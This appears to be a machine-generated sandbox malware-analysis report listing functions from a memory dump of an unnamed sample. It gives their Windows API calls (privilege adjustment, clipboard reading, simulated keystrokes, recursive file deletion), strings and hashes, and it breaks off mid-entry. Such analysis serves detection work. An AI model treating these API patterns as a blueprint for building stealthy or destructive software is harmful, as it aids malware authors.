Opcode ID: f6af5a3430e3d1f59a6c4870a5c6b1a32b9f0eab13f3de511d7b5d710ed16267
Instruction ID: 9d7a7460315d5d9ab0bf9f929cc7e6048b227c98c4b7bbf233e0e341ac26720d
Opcode Fuzzy Hash: f6af5a3430e3d1f59a6c4870a5c6b1a32b9f0eab13f3de511d7b5d710ed16267
Instruction Fuzzy Hash: 79D05EA65002292FDB54E6649C09DFB37ADC744104F0002B0B96DD2142EA20AE4586F0

Function 00D4193B Relevance: 1.5, APIs: 1, Instructions: 18windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00D41952

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: MessageSendTimeout
String ID:
API String ID: 1599653421-0
Opcode ID: ed054f4408cce80b7079602d5bb2f9f1d0f6e5dc0448311d0797d3b8a9910ad8
Instruction ID: 1c38527961b886f53023d318d017d2703fcb2800a92b2d4ef21b54d51c106e02
Opcode Fuzzy Hash: ed054f4408cce80b7079602d5bb2f9f1d0f6e5dc0448311d0797d3b8a9910ad8
Instruction Fuzzy Hash: 38D0C9B16902097EFB008761CD06DBB775CD721A81F0046657A06D6491D6649E099570

Function 00D7E390 Relevance: 1.5, APIs: 1, Instructions: 16windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D4193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00D41952

SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00D7E3AA

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: MessageSend$Timeout
String ID:
API String ID: 1777923405-0
Opcode ID: ed2efbcd9791338ba899a0582a6d582e565bf7e164e139e218e63b500d39aa20
Instruction ID: 8ee794bf4fa032396124ebd96ea6fb6ff2f737814b6b682b914708e0e51c242f
Opcode Fuzzy Hash: ed2efbcd9791338ba899a0582a6d582e565bf7e164e139e218e63b500d39aa20
Instruction Fuzzy Hash: B4D02230140210ABFA302B14FC02FC03792CB04300F1104A9F080B70E4C3E20C818560

Function 00D96FC3 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?), ref: 00D96FE1

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: ec8d8e86e4eeed472a0bf1896eea09afffc3ae00fe2fbd602b7bbd6afff0f494
Instruction ID: 9dbef0ca2a76862ec8b24b56aaba23287e49162a1ce606dd605877cce426a756
Opcode Fuzzy Hash: ec8d8e86e4eeed472a0bf1896eea09afffc3ae00fe2fbd602b7bbd6afff0f494
Instruction Fuzzy Hash: B2D067362146159F8701AB99DC44C8977E9EB4D7507018061F549DB231D621F8549BA4

Function 00D44FB3 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,00DB49DA,?,?,00000000), ref: 00D44FC4

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: f5c48eab33bb29afbd0f50537b99f90b0ea07bb8dde642ab48613346c45df059
Instruction ID: 374a01391b79d4f0c89b6aae228f85036c72a6811c244e5f4aed2274ef5e4b62
Opcode Fuzzy Hash: f5c48eab33bb29afbd0f50537b99f90b0ea07bb8dde642ab48613346c45df059
Instruction Fuzzy Hash: 60D0C974640309BFEB00CB90DC46F9ABBBDEB44718F200194F600A62D0D2F2BE408B65

Function 00DB4DDC Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00DB4DE7

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 5b305d9d14c3b9a90e6f924cf1a5c01863d0cecaca5926281f8682cfa51b2f2a
Instruction ID: 8afbf49e9ac3f6c76f0364632a18e577b689e8b3d62000d434a684d3c699e07f
Opcode Fuzzy Hash: 5b305d9d14c3b9a90e6f924cf1a5c01863d0cecaca5926281f8682cfa51b2f2a
Instruction Fuzzy Hash: A5D0C7715042019BDB245F65E804746B7D4AF51305F148429EDC5C2150D7B6D8C69B32

Function 00D450EC Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,00D450BE,?,00D45088,?,00D4BE3D,00E022E8,?,00000000,?,00D43E2E,?,00000000,?), ref: 00D4510C

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: d15f7011c5c90e46cdc0fa3e52ef8099b04866c53dce9ef947390c89afab3586
Instruction ID: 6e191f9e7021adbdab1014a9f586224be4a6203c7668af22db7b11e448118da1
Opcode Fuzzy Hash: d15f7011c5c90e46cdc0fa3e52ef8099b04866c53dce9ef947390c89afab3586
Instruction Fuzzy Hash: 03E0B67A400B02CBC2314F1AE804412FBF5FFE53A13258A2FD0E682664D7B05486DBA0

Non-executed Functions

Function 00DAA8DC Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00DAAFDB

Strings

%d/%02d/%02d, xrefs: 00DAAD0A

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: 0a4befccef8871f021e0a65943af1e3695ed679ee580c03d7658ffd91aa8d6ab
Instruction ID: 69b954dae6601c0f763402ccc3a0a501fa17067de5a9df642270328af272d34f
Opcode Fuzzy Hash: 0a4befccef8871f021e0a65943af1e3695ed679ee580c03d7658ffd91aa8d6ab
Instruction Fuzzy Hash: 99129E71500309AFEB258F68CC49FAE7BB9EF46310F144229F956EB291DB748941CB32

Function 00D5F78E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000), ref: 00D5F796
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DB4388
IsIconic.USER32(000000FF), ref: 00DB4391
ShowWindow.USER32(000000FF,00000009), ref: 00DB439E
SetForegroundWindow.USER32(000000FF), ref: 00DB43A8
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00DB43BE
GetCurrentThreadId.KERNEL32 ref: 00DB43C5
GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00DB43D1
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00DB43E2
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00DB43EA
AttachThreadInput.USER32(00000000,?,00000001), ref: 00DB43F2
SetForegroundWindow.USER32(000000FF), ref: 00DB43F5
MapVirtualKeyW.USER32(00000012,00000000), ref: 00DB440A
keybd_event.USER32(00000012,00000000), ref: 00DB4415
MapVirtualKeyW.USER32(00000012,00000000), ref: 00DB441F
keybd_event.USER32(00000012,00000000), ref: 00DB4424
MapVirtualKeyW.USER32(00000012,00000000), ref: 00DB442D
keybd_event.USER32(00000012,00000000), ref: 00DB4432
MapVirtualKeyW.USER32(00000012,00000000), ref: 00DB443C
keybd_event.USER32(00000012,00000000), ref: 00DB4441
SetForegroundWindow.USER32(000000FF), ref: 00DB4444
AttachThreadInput.USER32(000000FF,?,00000000), ref: 00DB446B

Strings

Shell_TrayWnd, xrefs: 00DB4383

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 9f83c9906b579c57a4774531d568dff0946816755a9bb69991bbdfdcdeccbe52
Instruction ID: 0ca50e2cdf0eef8ca82243efe46dd2ed1705f2b92ec5d11ab544c4f2696d032d
Opcode Fuzzy Hash: 9f83c9906b579c57a4774531d568dff0946816755a9bb69991bbdfdcdeccbe52
Instruction Fuzzy Hash: 92319671A80319BBEB216B719C49FBF7E6DEB44B50F154025FA05EA2D1C6B09D10EEB0

Function 00D86B3F Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 164filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00D431B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00D431DA

Part of subcall function 00D87B9F: __wsplitpath.LIBCMT ref: 00D87BBC
Part of subcall function 00D87B9F: __wsplitpath.LIBCMT ref: 00D87BCF

Part of subcall function 00D87C0C: GetFileAttributesW.KERNEL32(?,00D86A7B), ref: 00D87C0D

_wcscat.LIBCMT ref: 00D86B9D
_wcscat.LIBCMT ref: 00D86BBB
__wsplitpath.LIBCMT ref: 00D86BE2
FindFirstFileW.KERNEL32(?,?), ref: 00D86BF8
_wcscpy.LIBCMT ref: 00D86C57
_wcscat.LIBCMT ref: 00D86C6A
_wcscat.LIBCMT ref: 00D86C7D
lstrcmpiW.KERNEL32(?,?), ref: 00D86CAB
DeleteFileW.KERNEL32(?), ref: 00D86CBC
MoveFileW.KERNEL32(?,?), ref: 00D86CDB
MoveFileW.KERNEL32(?,?), ref: 00D86CEA
CopyFileW.KERNEL32(?,?,00000000), ref: 00D86CFF
DeleteFileW.KERNEL32(?), ref: 00D86D10
FindNextFileW.KERNEL32(00000000,00000010), ref: 00D86D37
FindClose.KERNEL32(00000000), ref: 00D86D53
FindClose.KERNEL32(00000000), ref: 00D86D61

Strings

\*.*, xrefs: 00D86B8C, 00D86B9B, 00D86BB9

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
String ID: \*.*
API String ID: 1867810238-1173974218
Opcode ID: ffd499dfc715ff205a5a5fc5e89c481b62dac19281df269f438e34ffcc6f17c5
Instruction ID: 46b775154a2db7da6a5eac5c391bba0fa63b6119d026109e7811392b009be579
Opcode Fuzzy Hash: ffd499dfc715ff205a5a5fc5e89c481b62dac19281df269f438e34ffcc6f17c5
Instruction Fuzzy Hash: 91512F72904259AACB21EBA0DC45EEE777DAF09314F0845E6E559E3141EB30EB88CF71

Function 00D97099 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00DDDBF0), ref: 00D970C3
IsClipboardFormatAvailable.USER32(0000000D), ref: 00D970D1
GetClipboardData.USER32(0000000D), ref: 00D970D9
CloseClipboard.USER32 ref: 00D970E5
GlobalLock.KERNEL32(00000000), ref: 00D97101
CloseClipboard.USER32 ref: 00D9710B
GlobalUnlock.KERNEL32(00000000), ref: 00D97120
IsClipboardFormatAvailable.USER32(00000001), ref: 00D9712D
GetClipboardData.USER32(00000001), ref: 00D97135
GlobalLock.KERNEL32(00000000), ref: 00D97142
GlobalUnlock.KERNEL32(00000000), ref: 00D97176
CloseClipboard.USER32 ref: 00D97283

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: e426405eaccaf8183f60aecf012b0bdae89ac179ef4304bef7f96882394eeee3
Instruction ID: bcbe487fd20e6eb8a5927f13b90071eddd6cef9c6f561c018ac11e5104942dfd
Opcode Fuzzy Hash: e426405eaccaf8183f60aecf012b0bdae89ac179ef4304bef7f96882394eeee3
Instruction Fuzzy Hash: E151B231218306ABDB10EB64DC86F6EB7A9EF84B00F144529F586D62D1EB70D905CB72

Function 00D7B9F1 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 223COMMON

Download Yara Rule

APIs

Part of subcall function 00D7BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D7BF0F
Part of subcall function 00D7BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D7BF3C
Part of subcall function 00D7BEC3: GetLastError.KERNEL32 ref: 00D7BF49

_memset.LIBCMT ref: 00D7BA34
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00D7BA86
CloseHandle.KERNEL32(?), ref: 00D7BA97
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00D7BAAE
GetProcessWindowStation.USER32 ref: 00D7BAC7
SetProcessWindowStation.USER32(00000000), ref: 00D7BAD1
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00D7BAEB

Part of subcall function 00D7B8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00D7B9EC), ref: 00D7B8C5
Part of subcall function 00D7B8B0: CloseHandle.KERNEL32(?,?,00D7B9EC), ref: 00D7B8D7

Strings

winsta0, xrefs: 00D7BAA9
default, xrefs: 00D7BAE6
, xrefs: 00D7BA43

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 1a2694525b8072e7bc1f08b3530ccf1a1b629c58f7aeff7719cfe25afa652d11
Instruction ID: 262518c70b5960f66dd3eb375981385f85d01a390411a6f19ce61915dbf786e3
Opcode Fuzzy Hash: 1a2694525b8072e7bc1f08b3530ccf1a1b629c58f7aeff7719cfe25afa652d11
Instruction Fuzzy Hash: C9813D7190020EAFDF119FA4CD45EEEBB79EF04314F18852AF919A6261EB318E15DB30

Function 00D8FDD2 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00D8FE03
FindClose.KERNEL32(00000000), ref: 00D8FE57
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00D8FE7C
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00D8FE93
FileTimeToSystemTime.KERNEL32(?,?), ref: 00D8FEBA
__swprintf.LIBCMT ref: 00D8FF06
__swprintf.LIBCMT ref: 00D8FF3F

Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F

__swprintf.LIBCMT ref: 00D8FF93

Part of subcall function 00D6234B: __woutput_l.LIBCMT ref: 00D623A4

__swprintf.LIBCMT ref: 00D8FFE1
__swprintf.LIBCMT ref: 00D90030
__swprintf.LIBCMT ref: 00D9007F
__swprintf.LIBCMT ref: 00D900CE

Strings

%02d, xrefs: 00D8FF88, 00D8FF91, 00D8FFDF, 00D9002E, 00D9007D, 00D900CC
%4d, xrefs: 00D8FF39
%4d%02d%02d%02d%02d%02d, xrefs: 00D8FF00

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 108614129-2428617273
Opcode ID: 06f0f95a8a9b9b56f8f6a7dc1bd637ded3dba9c0fa6d35ba6710f1236dc23f0f
Instruction ID: 5e1159402272f03afa410437a8b2746a79722774c7da9cc0736e3ce20e68ba5f
Opcode Fuzzy Hash: 06f0f95a8a9b9b56f8f6a7dc1bd637ded3dba9c0fa6d35ba6710f1236dc23f0f
Instruction Fuzzy Hash: BBA1FBB2418344ABC750EBA4CC86DAFB7EDEF94700F44092DB585C6151EB34EA49CBB2

Function 00D92044 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00D92065
_wcscmp.LIBCMT ref: 00D9207A
_wcscmp.LIBCMT ref: 00D92091
GetFileAttributesW.KERNEL32(?), ref: 00D920A3
SetFileAttributesW.KERNEL32(?,?), ref: 00D920BD
FindNextFileW.KERNEL32(00000000,?), ref: 00D920D5
FindClose.KERNEL32(00000000), ref: 00D920E0
FindFirstFileW.KERNEL32(*.*,?), ref: 00D920FC
_wcscmp.LIBCMT ref: 00D92123
_wcscmp.LIBCMT ref: 00D9213A
SetCurrentDirectoryW.KERNEL32(?), ref: 00D9214C
SetCurrentDirectoryW.KERNEL32(00DF3A68), ref: 00D9216A
FindNextFileW.KERNEL32(00000000,00000010), ref: 00D92174
FindClose.KERNEL32(00000000), ref: 00D92181
FindClose.KERNEL32(00000000), ref: 00D92191

Strings

*.*, xrefs: 00D920F7

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
